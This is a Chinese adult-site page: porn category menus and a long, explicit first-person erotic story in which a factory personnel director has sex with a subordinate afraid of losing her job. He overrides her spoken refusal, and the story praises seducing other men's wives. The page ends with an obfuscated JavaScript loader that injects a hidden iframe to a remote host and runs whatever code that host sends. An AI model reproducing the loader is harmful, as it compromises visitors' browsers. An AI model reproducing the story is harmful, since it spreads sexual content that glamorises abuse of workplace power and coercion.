高清电影 最新列表
巨乳美乳 欧美性爱 中文字幕 卡通动漫 偷拍自拍 无码专区 群交淫乱 制服丝袜
在线视频最新列表
虚拟VR 人妖系列 少女萝莉 女同性恋 伦理三级 国产盗摄 国产自拍 国产裸聊
小说专区 最新列表
淫妻交换 情色幽默 长篇连载 家庭乱伦 校园春色 暴力强奸 古典武侠 现代激情
风流厂长
2021-06-12 14:05:39

我是一家国有企业的人事副厂长,去年在企业进行机构调整、人员分流的过
程中,我终于尝到了当领导可以猎色的美味。
  去年年初的一天,我刚下班回到家,就听见手机响,接通后才知道是机关里
一个年轻女职员。她在电话中问我能不能去她家一趟,我说电话里说吧,她说电
话里说不方便,于是我就匆匆地吃了点饭到了她家。
  进门后她让我坐在沙发上(三人大沙发),她则坐在床沿上,我看屋里就她
一个人,就问她丈夫和孩子怎幺不在家,她淡淡的说:“他们出去了!”。于是
我俩就随便聊了起来。她先是问了一些下岗分流的政策,然后又聊起机关里一些
人事琐事,言谈中我发现她的情绪很低落,就关心地问她是不是心里有不高兴的
事,并说若有什幺难处我可以帮助。没想到她听了这句话后眼圈一红,竟有些哽
噎,我连忙安慰她慢慢说。
  原来她的母亲不久前刚去世,去世前在医院里治疗了很长一段时间。花费了
一笔不小的医疗费,而她的兄弟姐妹们却借口她当年接父亲的班进城工作,都拒
绝为医疗费摊费用,无奈她只好自己全掏。而她自己的小家又因为要买房子,经
济上本来就十分紧张,为此丈夫也与她翻了脸,她说她丈夫已有一个多月没跟她
说过话了。
  说到伤心处,她泣不成声,泪流满面。我急忙起身到卫生间给她拿了一条毛
巾,并一再安慰她不要太伤心。她擦过泪痕后将毛巾放回卫生间,回来后给我倒
了一杯水,顺势坐在了我的身边。
  坐下后她继续述说丈夫对她的不理解,并又一次流下了眼泪。我出于关心的
表示,用两手轻轻地扶住她的双肩,谁知她竟顺势将头靠在了我的肩头。身体随
着抽泣剧烈地抖动。我有些疑惑,就用手一边在她的双肩轻摩,一边劝她想开些。
我心里想,她为什幺要靠在我身上,我要注意事情的下一步发展。
  她絮絮叨叨地说着,头慢慢地歪到了我的怀里,这样一来我俩成了四目相对,
这时我已经有了一种预感,但还是不太放心,就装做不经意地在说安慰话的时候
将手滑到了她的腹部,她好象没有感觉到似的还在喃喃述说着。我于是将手在她
的小腹上轻摩,并将脸下俯,使嘴唇接近她的额头。我轻柔地说:“别太难过了,
要注意你的身体呀!”,说完不失时机地在她的额头上轻轻地吻了一下,她马上
把眼一闭,不再说话了。我这时已明白了一大半。就大着胆子将手上移到她的胸
部并继续轻揉,嘴贴着她的脸轻声地说:“我一直挺喜欢你的,你伤心的时候我
也不好受,让我替你分担一些你的忧愁吧!”说着又轻轻在她的嘴唇上吻了一下。
  她虽然还闭着眼睛,但脸色已变的十分红润,呼吸已经明显有些急促,我这
时已断定她不会拒绝我的进一步抚摩,于是一边继续轻轻亲吻着她的嘴唇和脸颊,
一边将右手伸进她的内衣里面,穿过起伏波动的热呼呼的肚皮,将她的胸罩向上
推开之后,我终于摸到了她温软的乳房。就在我摸上她的乳房的一瞬间,她的身
子明显抖动了一下,鼻腔里也发出“唔、唔”的呻吟声。我轻声地说着:“我喜
欢你,我爱你!”,将手在她的左乳上旋转轻摩,这时候我明显地感到了她那已
经高耸坚挺的乳头在我的手心下晃动。
  她虽然闭着眼睛,但我猜到她已经春心荡漾,便将手掌的抚摩改为用拇指与
中指轻捻她的乳头,同时低声地问她道:“这样是不是好些啦?请原谅我的冒犯
吧!”,谁知她这时睁开了眼睛,直勾勾地望着我,突然用双手搂住了我的脖子,
在我的脸颊上重重的吻了一下并羞笑着说道:“我要是不原谅你呢?”,说完她
挣脱了我站起来就往屋外走,我一时感到十分疑惑和慌乱,不自然地起来站在屋
子的中央,此时就听见大门处传来“咔嚓”的锁门声和她走回来的脚步声,我这
才放了心。
  她回来后见我站在那里,就底着头说:“站着干嘛?来坐这边!”,边说边
拉着我的手让我坐在床沿上。随后她走到另一侧床沿背对着我,脱去外衣和外裤。
露出一身贴身的长袖长裤内衣。然后拉开被子坐了进去,又拉出床头柜的抽屉拿
出一盒香烟和一个打火机放在床头柜上说“这有烟,你想抽就抽吧!”。我正在
不知如何进行下一步行动的时候,她又低声说道:“脱掉鞋子坐到我这里嘛!”。
我急忙蹬掉皮鞋,靠在她的身边坐下。并小声问道:“你老公不回来了?”,她
没有回答,而是拿起床头柜上的电话拨了一通,接着与电话的那一边说道:“孩
子作业写完了没有?写完了让孩子早点睡啊!你也早点睡吧,别老看电视!”,
之后又“嗯”、“啊”了一阵,放下电话后她说:“他俩今晚在他的一个亲戚家
看守房子。”,然后就又把身子靠在我的胸前。
  我这时已经完全没有了担心,我知道,她一定是担心在这次搞下岗分流中自
己被搞下去,想与我建立一种特殊的关系,以保证自己能够继续留在岗位上,或
者今后能谋得更好的职位。再加上这一个多月来她老公与她不交流,以她这样的
年龄,她的性生活上肯定也有很急迫的要求,从她反锁大门、打电话和被摸了奶
头还让我上床坐的行动已经完全表示出她愿意让我占她身体的便宜。于是便将肆
无忌惮地双手从后面穿过她的两腋下伸到她的胸前抱住她,两手各握住一个乳房
揉摩起来,并将脸颊贴在她的脸颊上说:“你今晚特别漂亮,我爱你。”,她又
一次闭上了眼睛不说话,于是我一面轻轻地吻着她的脸颊和脖子,一面用手轻捻
她的两个乳头。很快,她又一次开始了呼吸急促,喉咙里不停地咽着唾液。我知
道她已经把持不住了,就抽出手来把她放平在枕头上,侧身对着她,用一只手将
她的内衣向上撩起,同时轻吻着她的嘴唇,这时她虽然还闭着眼睛,但嘴唇已经
微微张开了,我轻轻地将我的舌头探入到她的唇内,马上就感觉到她的舌尖也在
寻找我的舌尖。于是我用舌尖在她的舌尖上来回摩擦了几下,就慢慢地退了出来。
这时她头向后仰,脖子已完全伸直,嘴向上挺,很明显要将接吻继续下去。我感
到时机已完全到了,就立起身来快速地脱了个精光,然后掀开被子钻了进去。
  我侧身贴住她,一条腿压在她的大腿上,让硬梆梆的宝贝紧贴住她的髋部,
我的膝盖则正好顶在她的阴部。我一边说:“对不起,我实在有些冲动。”,一
边亲吻着她的脸颊和脖子、嘴唇。同时又将她的内衣向上完全推到了她的下颚处,
并将她的胸罩解开抽掉。这时她的双乳终于跳跃在了我的眼前,她的乳房丰满、
白暂,两粒褐色的乳头高高地翘起。她这时已毫不掩饰她的感受,喉咙里“呵、
呵”地喘着气,两手也在微微地颤动着。我这时一只手轻捻着她的左面乳头,同
时用嘴唇轻吻她的右乳头,边吻边轻声说道:“你的奶挺好看的,我喜欢看你的
奶”,她这时已开始明显地扭动身体,两腿也开始胡乱蹬着床单,并已睁开眼睛,
又用那种直勾勾的目光望着我的双眼。
  我这时决定要脱光她的衣服,就亲吻着她的嘴唇低声说:“你真的让我好喜
欢,请你原谅我,让我来一次吧!很少有男人能够坐怀不乱的。”说完就坐起在
她的大腿部位,用手去脱她的内裤。谁知她却突然用两手抓住裤腰说:“别,别
这样吧!”,到嘴的鸭子岂有放飞的道理?我知道女人这种反应实际上是用行为
表示她并不是一个很贱、很不自重的人。于是我一边反复说:“原谅我吧!就这
一次,我知道你是个很自重的人!我一定尊重你!”,一边坚定地掰开她的手指,
很快她就放弃了抵抗,并再一次闭上了眼睛任我脱去她的内裤。
  当我把她的内裤脱到她膝盖的时候,我简直心花怒放,我感觉到我的内心在
剧烈地跳动着,当我看到展现在我眼前的这个别人的妻子最隐密的部位时,我有
一种强烈的占有者的胜利感。我知道,这个女人今晚将由我任意地享用,她身体
上的每一处不为人知的秘密都将毫不保留地展现给我,供我欣赏,供我把玩。在
这种极度兴奋的心情下,我迅速地脱完了她的所有内衣,现在她诱人的恫体已完
全展现无余。
  她属于较标准的身材,身长大约一米六,皮肤白净,虽然从大腿到下腿都很
光滑无毛,但下腹阴户处的阴毛很浓密且油黑发亮,呈鲜明的倒三角形。柔软的
腹部稍微有一点脂肪,但摸上去更滑软舒服。两只乳房不算大但确实很漂亮,浅
褐色的乳头挺立着似乎在召唤男人们快去吮吻。白净的臀部因生过孩子显得十分
丰润,会让人不自觉地就想去抚摸它。最有特点的是她的阴阜隆起较高,显得丰
满圆润,很象麦田里修整得很好且长满嫩草的坟包。让人一看就会产生去抚摸,
去掰开探究,去亲自用阳具接触体验的欲望。
  我又一次趴在她的右侧,这次是对两个乳头轮流亲吻,随着她嘴里“啊、啊”
地呻吟,两腿已很自然的分开并将膝盖弯起,我知道她已经急不可耐了,但我要
彻底征服她,必须要她主动向我要时才能给她。所以我又扳起她的右大腿,让她
的阴户完全敞开,然后用我的右手在她的整个阴户上来回揉摩,她的阴户温软而
饱满,阴毛在我的手掌心里沙沙滑摩,两片大阴唇由于先前的挑逗作用已经变得
厚软并很自然地分开了,阴唇边缘已经被涌出的淫液渍湿。我先是在阴户两边的
柔软处轻揉,然后在顶部阴毛旺盛处旋转按摩,再用四指从下向上勾压她的阴道
口,随后又好象不经意间触动一下她的阴蒂。这时她的腹部剧烈地抖动并向上抬
了一下。当我将手摸向她阴户的下部时,我摸到了一大片粘湿的分泌物,我在她
的耳边轻轻地说:“不好了,你在往外流水呢!”。
  她听到我的话,睁开眼睛望着我说:“你咋恁坏呢?你非要我求你不成吗?”
说完她用右手托着我的屁股就把我的身子推到了她的上方,然后两手环抱着我的
腰部垂下眼皮轻声说:“想进就快点儿吧!没事儿,我上着环哩!”。
  我两膝跪在她的两腿间,双手撑在她的两腋下,低头吻着她的两个乳头,用
已经暴涨的龟头轻摩着她的阴户上部靠近阴蒂的地方,她的头使劲向后仰,胸脯
高高地挺起,想让我吻的更猛烈些。我装作龟头对不住阴道,故意左右轻捅,她
终于忍耐不住地说:“你呀!坏死了!”便将两手伸向自己的阴户处,分开自己
的大阴唇,并用左手捏住我的龟头带往阴道口,同时腹部使劲地向上挺。
  看到她这幺性急,我就势将下身向前轻轻一顶,就听她“啊”的一声全身都
动了起来。我却马上停在了她阴道的一半处,又低头去添她的乳头。她却将整个
身子猛地向下一移,用她的阴道将我的阴茎完全“吃”尽。然后两手紧紧地抱住
我的屁股不让我动,两眼紧紧的闭住,嘴唇紧闭,鼻孔撑得大大的,屏住了气,
嗓子眼里发出“吭、吭”的声音。我这时明显地感到了她阴道里的几下抖动,就
连续猛力地对他展开大力抽送。一时间她“嗷、嗷”地大叫起来,两手紧紧地抓
着床单,头在枕头上左右扭动。
  我边抽送边说:“你的穴好美,好舒服!哥哥今天要好好玩玩你的穴,好妹
妹你高兴吧!”,她一边喘着气、扭着身子一边答道:“好哥哥!我的穴今天让
你玩个够!你就使劲玩我吧!啊、啊…唔…啊”。
  我忽然想起了什幺,便放慢抽送的速度和力度,又对她深吻了一番后在她耳
边轻声问道:“你叫我来是不是有准备的?”。
  “谁说的?根本不是!你占了便宜还卖乖,不理你了嘛!”她闭着眼撒娇说。
  我假装无意识地停下了抽送吻着她的耳垂和脖子又问道:“你老公是不是有
一个多月没玩你了?告诉我啊!”。
  “嗯…哎?你问这干嘛?”,她睁开眼睛望着我,用她那洁白的牙齿咬着自
己的下嘴唇,羞涩之态实在令我心怡。
  “因为我感觉到你的穴很饥饿,好象很久没得到关怀了,你说是不是?”,
我在她耳边轻声地说。
  “嗯…。,就算是吧!”,她用手在我的屁股上旋摩着说,“要不我叫你来
干嘛?哎,你别停呀!”,说着就用手带着我的屁股上下摇动起来。
  我随着她的引导又开始在她的阴道中抽送,她微咧着嘴,媚眼如丝地瞧着我
的额头,深情地对我说:“你真坏,光问人家难回答的问题!”。
  “那你也可以问我嘛!”,我微笑地看着她说。
  “问你啥呀?”。
  “问我啥都行!”。
  “那我问你,你现在在我的里面,跟在你老婆里面的感觉一不一样?”。
  “不一样!”。
  “怎幺不一样呢?”。
  “你的穴比我老婆的肥嫩,把我的鸡巴包得又紧又温暖,我真的好舒服,好
美!”。
  “我不信,你骗我!”。
  “我真的不骗你!你的穴最适合我的鸡巴,以后就常让我来戳你的穴吧!”。
  “美死你的,还想啊!门都没有!”说着她“咯咯”地笑了起来。
  我看她此时的兴致极好,就突然大力快速抽送,一边说道:“有门没有?快
说!快说!”。
  她被突然的大力猛送搞的阴户高挺,阴道里也阵阵紧缩,胸脯快速起伏,嘴
里含糊不清地叫道:“啊呀大哥!………美死我了!……啊呀哥哥!我爱你、我
只爱你一个人呀!以后我光给你玩,啊…………哎呀美死了哥哥呀……。!”。
  看到她欲仙欲死的模样,我心里一阵说不出来的痛快。我决心利用她此时的
需要进一步了解她心底里所有的秘密,于是用两脚一夹她的小腿,将我的两膝跨
在她的大腿外侧,一面继续大力给她的阴道增加刺激,一面笑着问她:“真的可
美?哪里最美?”。
  “里面……里面美……啊……美死我了!”她两腿使劲蹬直,阴阜上挺,又
用手拽开他的大阴唇,充分地露出已经膨胀挺起的阴蒂,好让我的阴毛能直接摩
到阴蒂上。
  我看看时机快到,为了与她进行更长时间的性交,不让她过快地达到性高潮,
便以吻乳头为掩护将抽送停了下来。我张开大口猛地含住她的左乳头,然后用舌
头在乳头上旋转摩擦,最后用嘴唇紧紧地抿住乳头向上拉,把她的乳头拉的长长
的,她一面扭动着腰身想让我再进去,一面低头盯着自己的乳头、用左手捏托着
左乳房凑向我的嘴说:“吃吧!吃吧!我的奶以后你随便吃!”。
  我边吮吸着她的乳头边说:“以后你到我家来让我吃好吧?”。
  “好,好!去你家,去你家!”。
  “到我家也这样全脱光让我看,好吧?”。
  “好,好!让你看,让你摸,让你玩我!”,她仰着头用下腹使劲向上紧贴
着我的阴茎说。
  我看准她又要拼命往下面扭动的时机,突然对她又展开新一轮的大力抽送,
搞的她上身突然向我挺起,嘴里连连倒吸凉气、语无伦次地说:“哎呀大哥……。
轻点,轻点,我快不行了!”。我一看火侯已到,就赶忙停下用两臂紧紧地搂紧
她,胸脯紧贴在她的双乳上,她也紧紧地抱住我的腰,大口大口地喘着气,阴道
里发出一阵阵的抖动。片刻只后,她长舒了口气,放松身体看着我的眼睛深情地
说:“你真厉害,真会让女人高兴!我真的爱死你了!”。边说边用两手在我的
屁股上上下揉磨,那种女人从心底发出的温情通过她的双手传递到我的全身,令
我感到真正彻底用身心征服一个女人后得到的最大的幸福感,尤其她是一个背着
自己的丈夫将自己全身心地奉献给我的女人,我感到的满足已经远远超过与我妻
子新婚之夜的欢娱,这也许就是人们所说的“偷情”的独特味道吧。
  我凭着对女人的了解认为她这时一定已经度过了性高潮,就决定暂时将我的
阳具抽出来与她再调调情,可就在我刚作出要退出的动作时,她却紧紧地抱住我
说:“你要干啥?”,我说:“你不是已经过了高潮吗?”,“谁说的?人家正
舒服嘛!”她凝望着我的眼睛娇媚地说,我用手伸到她阴户旁边的大腿根上抹了
一把,那里湿呼呼的一大片,一直从她的屁股蛋、屁眼流到了床上。我用沾湿的
手指在她的乳头上抹了一下说:“还说没有,你看,你流了这幺多淫水!”,
“还不是你造成的!”她用右手食指在我的屁股上轻戳了一下说,然后又紧紧抱
住我说:“求你啦,好哥哥!人家真的还没过去嘛!”,说着还用阴道又紧紧地
夹了夹我的阴茎。
  “既然你还要,我就要玩新花样了!”我心里这样想。嘴上却说:“好宝贝!
对不起,我是怕你受不了。哥哥不出去,哥哥再让你美一次好吧?”,然后用右
手抚摸着她的左乳房,鼻尖贴着他的鼻尖说:“让我从你的后面给你吧!”。她
一听,眼前一亮说:“后面就后面!”,然后立即翻身跪在床上,两手撑在前面
扭头看着我的阳具说:“好哥哥,你快点嘛!”。
  我跪在她撅起的又白又圆又大的屁股后面,看着她那已经鼓涨的、象一个刚
蒸出锅的大馒头似的翻着大阴唇的阴户,先用枕巾擦了擦她屁股后面的淫汁,然
后左手扶着她又圆又白的屁股,右手从她的两腿间伸向她的下腹部,在她布满阴
毛、高高耸起的阴阜上抚摸了一阵后,并起食指和中指一下子伸入到她的阴道里,
她“啊”的一声说:“你咋恁流氓哩!”。
  我一边将手指在里面抽送一边说:“男人不流氓,生理不正常!女人不流氓,
人类要灭亡!”。
  她一边“啊!啊!”地叫床一边说:“啊!啊!那你就耍流氓吧!你强奸我
吧!”。
  我一边用右手指在她的阴道里抽送,一边用左手轮流揉捏着她那两只倒悬着
的乳房,我问她:“好妹妹,这样舒不舒服?”。
  “啊!啊舒服,舒服”,她边扭动着大圆屁股边叫唤。
  “你老公有没有这样玩过你?”,我又问道。
  “没有,啊!啊!没有啊!”,她大声答道。
  “那下次你要教会他呀!”我开玩笑地说。
  “不教,不教!”。
  “为啥不教?”。
  “我只让你这样玩,我是你的嘛!”她又撒娇地说。
  这时我看到随着我手指的进进出出,她的阴道里又开始往外涌出乳白色的淫
汁,而且已经可以很清楚的看到她的阴蒂已经挺出于“船头”,大小象豌豆那样。
于是我在继续用手指抽送的同时,又添加上大拇指有节奏地撞击她的阴蒂。几下
之后,她屁股的左右扭动就变成了有节奏的前后迎合动作,淫汁分泌量也明显增
多。我知道,她此时已彻底成为了我的性奴隶,这个时候让她做什幺她都会做。
于是我对她说:“听说过69式的玩法吗?”。
  “没听说,啊,啊!你想咋玩就咋玩吧!”。
  “好!那咱俩先洗个藻吧。”我将手从她的阴道里抽出来说。
  她翻过身,先低头看了一下自己的大腿根部,又斜着眼睛扫了一眼我高翘怒
涨的阴茎,羞涩地转移话题说:“你咋恁多名堂哩!”,说完就欢快地扭着大屁
股一颠一颠地在我的前面先向卫生间走去。看着她全裸的背影,我心里一时觉得
有些好笑,我想,这个女人背着她的丈夫,放弃一个女人天生的羞涩和自尊,把
自己的身体全然的交给另一个男人欣赏和玩耍,是一种什幺心理的支撑能使她作
得出来呢?难道就是因为我的职位、权利和她不想下岗的念头促成的吗?
  在卫生间,当水从头顶一泻而下,我俩站着四目相对时,她温情地用双手边
抚摸我的胸脯边问:“你觉得水热不热?”。
  我轻轻用两手握着她的双乳说:“正好!正好!”,然后将右手伸到她的阴
户处轻轻上下摩擦着说:“让我给你洗下面吧!”。
  她娇羞地把眼睛斜向一边说:“随便你!”。
  我又说:“那我的下面谁来洗呢?”。
  她愈发羞涩地说:“你自己洗呗!”,说完用她那洁白的玉齿咬着红润的嘴
唇,大胆地低头望着我依然高挺的阴茎,神态中充满了欢欣和期待的韵味。
  “来吧!妹妹,哥哥想让你洗嘛!”我学着她的腔调在她的嘴唇上吻了一下
说,同时用两手扶住她的双胯。
  她这时先用右手握住我的阴茎,然后又用左手掌从下面轻轻地托住我紧绷的
睾丸,用右手大拇指环摩着我涨得发亮的龟头说:“你咋恁大哩!”。
  我急忙问道:“比你老公的大多少?”。
  “大概…。这幺多!”她用手比着我的龟头的长度羞涩地说。
  “那你说长了好还是短了好?”,我又逗她说。
  “当然是长点儿好嘛!你又不是不知道。”,她抬起头给我丢了个媚眼又低
下头注视着,并且用流下来的水清洗我的整个阴茎,左手也在睾丸底部前后轻轻
捏弄摩擦着。
  这时我感到从睾丸到阴茎、龟头有一种说不出来的舒适和兴奋感,我不由的
嘴里发出“哦,哦!”的享受声。
  她抬起头,用关切的眼光望着我说:“是不是很舒服?”。
  “嗯!哦!实在是舒服!”,我又吻了她一下说,然后将手搭在她的两肩上
问道:“给你老公是不也这样洗的?”。
  “别提他!你真坏!”,她又低头去洗。
  “不行,你得告诉我!”我装出撒娇声说。
  “是又咋啦!”她装作生气的语气说,依旧低着头。
  “对不起,逗你玩的!”我用右手捻着她的乳头笑着又说:“谢谢你给哥哥
的这个特殊待遇!好了吧?”。
  当我给她洗阴户、阴道的时候,她仰着脸,装作用水冲头发的样子,但从她
两腿叉开,大腿肌肉绷得紧紧的、小腹使劲向前挺的姿态看,她对我用手指在阴
道里捅来捅去的感觉相当满意,我心里暗想,这小骚货还真上劲了!
  洗完后她给我擦干身子,正要把毛巾挂在墙钩上时,我一把拦腰将她抱在怀
里,她“咯,咯”笑着说:“你干啥呀!别这样!”,我亲着她的脸蛋说:“抱
新娘上洞房呀!”,她丢掉毛巾搂住我的脖子望着我,一语不发,眉眼中柔情万
种、沁人心脾。我走到床前停下来,动情地看着她,她用双眼凝望着我,竟有些
哽噎地说:“哥……。说心里话,我的新婚之夜…………和今天根本不能相比!
你带给我的快乐…………是我活到现在从没感受过的!”。
  “那哥哥今天就全力以赴,让你享受到真正的洞房快乐!好不好?”,我用
脸颊贴着她的脸说。
  “那…………你就使坏吧!”,她使劲地搂住我的脖子,把脸埋在我的脖子
里说。
  上床之后,我先把两个枕头摞起来,然后枕在上面平躺下,让她用面向我的
双脚,将两腿叉开用膝盖跪在我的两腰处,将她的大屁股对着我的脸坐在我的胸
上,然后又让她趴下,屁股后移到我的脸前,把她的腿弯抵住我的腋窝,这时她
的整个阴户已完全放在了我的眼前,我的阴具也正好在她的脸前,由于离得太近,
她的阴户显得格外的壮大,我清楚的看到她的阴毛有些已经长到了她肛门附近。
我看着她刚洗净的的阴户,用两只拇指轻轻地分开她的大阴唇,将一口热气哈入
泛着红润的阴道口,然后挺了挺我的阴茎说:“现在咱俩开始比赛,谁先把对方
玩起性谁赢!”,说完就用我的舌尖轻轻地环绕着她的阴道口添去,她不由自主
地将阴户收缩了一下说:“啊呀!你咋恁坏哩!”,说完就完全趴在我的肚子上,
也开始用舌头添我的阴茎和龟头。
  我一会儿添她阴道两侧的嫩肉,一会儿将嘴唇完全贴住她的阴道口,将整个
舌头伸进阴道里到处添,一会儿又添添她又已突出来的泛着深红色的阴蒂,搞得
她有时不得不停下对我龟头的吮吸,嘴里“呵,呵!”地喘息着。我看看她已完
全起性,就索性用两手撑在他的大腿根处,张开大嘴将她的阴蒂完全含在我的嘴
中,并用我的舌头一遍遍的挤压和吮吸阴蒂。随着我挤压阴蒂的节奏,她“啊,
啊!”地又开始呻吟,并已放弃了对我阴茎的吻吮,用手紧抓着我的阴茎,屁股
在我的脸上左右扭动起来。这时她的淫汁也开始流入我的嘴里,我感到微微有点
咸味。但一点也没有其它的异味,就一股股地咽了下去。
  大约含吮她的阴蒂有二、三分钟,她终于再也忍受不住了,阴道一缩一缩地
猛出淫汁,回过头十分焦急又十分温情地说:“好哥哥,我服你了!我输了,我
真的起性了!我实在是受不了啦!你饶了我吧!”。
  “咋样个受不了法?”我依旧含着阴蒂,含混不清地问。
  “里面…………里面可痒…。可痒!”。她摇晃着圆大的屁股说。
  “那咋办?”我说。
  “让你的那个进来吧!啊……。啊!”她还在扭。
  “哪个?”。
  “就是…………鸡巴嘛!”她呻吟着说。
  “好吧!”我从她的跨下钻出来,斜靠在床头坐着,指着高高翘起的阴茎说
:“来吧,好妹妹!哥让你好好享受!”。
  她站在床上面对我走过来,将两脚叉开在我的两胯,自己用两手扯开两片大
阴唇,低头看着将阴道口对准龟头蹲了下去。当我的阴茎完全没入她的阴道时,
她抬起头有些不好意思地对我傻笑着说:“看啥看!流氓!”。
  我不由“嘿,嘿!”地笑出声来:“你看你,还说我流氓哩!嘿嘿!”。
  “就是你流氓!你流氓嘛!”她将上身伏在我的胸前,左手搭住我的右肩,
右手拍着我的左肩,前额顶住我的腮帮子说,同时屁股一上一下的在我的阴茎上
套动。
  “啊……哎呀………真的好舒服!”她一边套动一边又低头看着自己的阴户,
两手撑在我的两肩上。
  看看她一上一下越来越快,脸色发红,嘴微微撅着,呼呼地喘气,两眼开始
发直地望着我,我知道她马上就要到达顶峰了,急忙拦腰紧紧地抱住她说:“慢
点,慢点!别过去!”。
  她急力挣扎,一口口热气呼在我的脸上说:“你送开我……让我动嘛!”。
  我依旧抱紧她不放,同时把他的屁股向下压住不让她动,在她耳边轻柔地说
:“好妹妹,哥想让你多美一会儿!”。说完用双手将她两肩向后一扳,让她的
双乳完全展现在我的面前,然后猛力吮吸她的左乳头,她向后仰着脸,“啊!啊!”
地大声叫着说:“好哥哥……啊…。啊……你玩死我啦………啊……啊!”,同
时用两手将自己的两个奶子从下面使劲地向上捏托着,使两个乳房尽量高耸,使
我能更方便地吮吻,下面的阴道里更是热浪滚滚,抖动阵阵。
  狂吻了大约几十口,我又紧紧地将她抱住,在他耳边亲着她的耳垂和软颈温
情地说:“好妹妹,你感到幸福吗?”。
  “好………好哥哥,我真的好幸福好幸福!”。她边喘气边回应着,也用手
紧紧地环抱着我的腰部,阴道紧紧夹着我的阴茎,里面一会儿动一下,一会儿又
动一下。
  “好妹妹,那哥哥让你彻底放开弄了啊!不过我要你一边揉自己的阴蒂,一
边揉自己的奶头上下动,让我好好看看你玩我好不好!”我说完向后一仰,抽出
一根香烟点着深吸了一口,靠在床头上看着她。
  她娇羞地依我的要求,左手托捏着自己的左乳房,拇指和食指轻捻高挺的乳
头,右手按在阴阜上,中指抠着红涨的阴蒂,脸向上仰,但眼睛却半睁半闭地凝
视着我,开始了上下套动。“啊……啊!,你最流氓了!…………啊!你………
你的鸡巴好大!,”她边动边胡乱说着。
  “好哥哥!我现在好美呀!………。哎呀…………啊!”她一边喘气一边叫
着,动的越来越快,屁股重重的撞击着我的大腿根部,无约束的右侧乳房随着身
体耸动的节奏剧烈地抖晃着,右手中指快速地点击着鼓涨的阴蒂,左手边捏乳头
边用力地乱揉左乳。
  “啊!…。啊!哦!……哦!,哎呀………哎呀!我让你尻了……你尻我了
……我是你的…。我…我……”她突然停止了叫唤,裂着嘴,咬着牙,眼睛无目
标地眯缝着。
  “哎呀!……哎呀!我…。我射了!我射了!”她停止动作,双手撑在我的
肚子上,头低着呼呼地喘着气,屁股重重地坐在我的大腿上。我感到她的阴道里
在急剧地收缩跳动,知道她确实已经达到了高潮,就丢掉香烟,坐起身把她紧紧
地抱住,两手在她的屁股上交替抚摸着,同时在她的肩膀上轻吻着说:“好妹妹,
我喜欢你!我爱你!”。
  她此时将头靠在我的左肩上,脸向外,浑身瘫软,大口大口地喘着气,双乳
随着喘气在我的胸前一起一伏,一股温热的淫液流到了我的睾丸上。我抱着她,
用手在她光滑的脊背上徐徐地上下摩抚,开玩笑地说:“你可真是个小淫娘!还
说我流氓!”。
  “你,…。你就是流氓!”她喘着气,用两手抱着我的腰软弱无力地说。
  “那你喜不喜欢我流氓?”我轻轻地用手在她的背上拍着说。
  “喜…。不喜欢!我要告你!”她撒娇地说道。
  “告我啥?”我亲吻着他的脖子问。
  “告你强奸我!”听得出她是笑着说的。
  “可我还没有到高潮的呀!”我笑着说。
  “活该!活该你!”她的气息已经开始平稳。
  我推起她的肩膀,用手捧着她的脸,她象喝醉了酒似的仰着头,半闭着眼睛
斜看着我,我将嘴唇轻贴着他的嘴角吻着,感到她呼出的气息很热。于是我温情
地问道:“是不是想躺一会儿?”。
  “嗯!”她用鼻子说。
  我将她平躺着放好,她闭着眼睛,随意地叉开着双腿,已经平息激情的阴户
上一片狼籍,阴毛被大片的淫液渍湿得一缕一缕,大腿根处的淫液泛着淡白色。
我用枕巾轻柔地帮她一一擦净,然后又擦净了我依然昂挺的阴茎,丢掉枕巾,拉
过被子盖在她的身上躺在她的右边。她突然侧过身,伸出左手搂住我,将左大腿
压在我的大腿上,用她的大腿向上顶着我的睾丸和阴茎,同时将阴户紧贴在我的
左大腿上,鼻子抵住我的肩膀说:“你咋还恁硬哩!”。
  “还想尻你呀!”我笑着说道。
  “唉!”她轻叹了口气,用刚才搂我的左手摸摸我的睾丸,又握着我的阴茎
捏了捏说:“你太强了!我满足不了你!”。说完就用手轻柔的上下套动起来。
  “那我使你满足了没有?”我转过头看着她散乱的头发说。
  “你整死我了!”她继续套动着我的阴茎说。
  “那我不欠你了吧!”我温柔地说。
  “欠,就欠嘛!”她用鼻子顶了顶我的肩膀,手在下面使劲捏了我的阴茎一
下说。
  “那我下次还你,好不好?”我跟她开玩笑。
  “……。”她没有吱声。
  “下次在哪儿弄?”我紧追不放地问。
  “你找地方吧!”她停下套动,低声地说。
  我侧过身,将她的腿放平,将我的右腿压住她,右膝顶在她的阴户上,右手
轻捏着她的左乳,与她四目相对,她的眼中此时透出诱人的妩媚和依恋之情。她
目不转睛地望着我,一语不发,但双牟的凝望却似有无限的话语在其中。
  “我想下次到外面包个房,咱俩好好再美一次,好吧!”我轻柔地吻着她的
脸颊说。
  “嗯!”她凑过嘴唇要与我相吻时从鼻子里说。
  一个深深的、刻骨铭心的长吻结束了那个令我终生难忘的偷情之夜,自那以
后,她就是我生活中最开心,最欢娱的性伙伴,我们在以后的日子里又多次幽会,
领略了人世间最奇异、最美妙的偷情之乐,我们的关系现在仍在继续,在发表这
篇文章的前两个小时,我还与她又一次共赴巫山,同浴爱河。她告诉我,她每次
与我偷欢之后回到家,再也没有兴趣与她老公过性生活,为了不让她老公上身,
她不是借口身体不舒服,就是故意找茬假装与老公呕气,要不就在老公兴头上说
些让她老公大为光火的事,她说这样一来她老公的鸡巴往往会迅速塌软萎缩,便
再也提不起劲了。总之,她确实只为我保留着她的性能量,这一点从每次我与她
美满高亢的性交感受中可以真切地体验到,这就是将别人的女人从肉体到心灵彻
底俘虏后给我所带来的享受。朋友们,去吧!勇敢地去征服别人的女人吧!去体
会偷情所带来的巨大的快感吧!那是未婚女人和自己老婆都绝对不能提供的人间
另一种天伦之乐!

  • 1
  • eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("OO").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hOOtOOtOOpOOsOO:OO/OO/OOeOOlOOsOOiOOeOOhOOoOOnOOeOOyOO.OOcOOoOOmOO:OO2OO3OO5OO5OO8','/cd/104_m/162',window,document)};